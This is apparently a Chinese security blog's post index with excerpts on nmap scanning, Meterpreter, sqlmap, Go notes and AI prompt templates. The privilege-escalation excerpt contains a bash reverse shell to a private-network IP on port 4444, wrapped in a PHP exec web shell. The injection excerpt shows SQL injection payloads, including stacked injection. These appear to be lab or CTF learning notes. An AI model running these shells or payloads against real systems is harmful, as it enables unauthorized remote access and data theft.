注意
摘要: md5 -n必要有 echo -n 'asdf' | md5sum | awk -F ' ' '{print $1}'
3
0
0
信息收集nmap
摘要: 信息收集nmap sudo nmap -sn 192.168.37.0/24 sudo nmap -sT --min-rate 1000 -p- 192.168.37.7 -oA nmapscan/ports ports=$(grep open nmapscan/ports.nmap | awk -
14
0
0
提权
摘要: /bin/bash -i >& /dev/tcp/192.168.37.8/4444 0>&1 <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.37.8/4444 0>&1'"); ?> sudo nc lvnp 4444 whoami s
12
0
0
AI 命令-更新
摘要: 学术润色 作为一名学术论文写作改进助理,你的任务是改进所提供文本的拼写、语法、专业性、清晰、简洁和整体可读性,同时分解长句,减少重复,并提供改进建议。请只提供文本的更正英文版本,避免包括解释。请编辑以下文本 翻译 我希望你扮演日语翻译的角色,不需要理解上下文,只需要单独翻译我给你一次性发送的话。我会
13
0
0
malware_detaction_ML
摘要: 使用ML对恶意软件进行识别 import pandas as pd data = pd.read_csv("MalwareData.csv", sep='|') print(data.columns) legit = data[0:41323].drop('legitimate', axis=1)
14
0
0
meterpreter命令总结
摘要: # meterpreter命令总结 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、
508
0
0
cmd命令(持续更新)
摘要: tracert www.baidu.com
28
0
0
注入技巧
摘要: 尝试注入: 测试 1' or 1=1 # ,初步判定存在SQL注入。 1' or 1=1 # 再测试字段数,到3时报错,说明字段数为2. 1' order by 1 # 接着尝试union注入,回显了过滤的关键字。 1' union select 1,2# 然后就是今天学会的新姿势“堆叠注入”了。
43
0
0
go学习
摘要: go环境变量 $GOPATH 在1.11之前它是我们书写项目的工作目录 在1.11之后它内部存储的是我们公共go.mod下载的依赖包 $GOROOT 安装目录 $GOARCH 目标机器的处理器架构,它的值可以是386、amd64 或arm. $GoOS 表示目标机器的操作系统,它的值可以是darwi
36
0
0
SQLMAP使用
摘要: sqlmap使用教程 -u 指定目标URL (可以是http协议也可以是https协议) -d 连接数据库 --dbs 列出所有的数据库 --current-db 列出当前数据库 --tables 列出当前的表 --columns 列出当前的列 -D 选择使用哪个数据库 -T 选择使用哪个表 -C
61
0
0
点击右上角即可分享
微信分享提示
深色
回顶
收起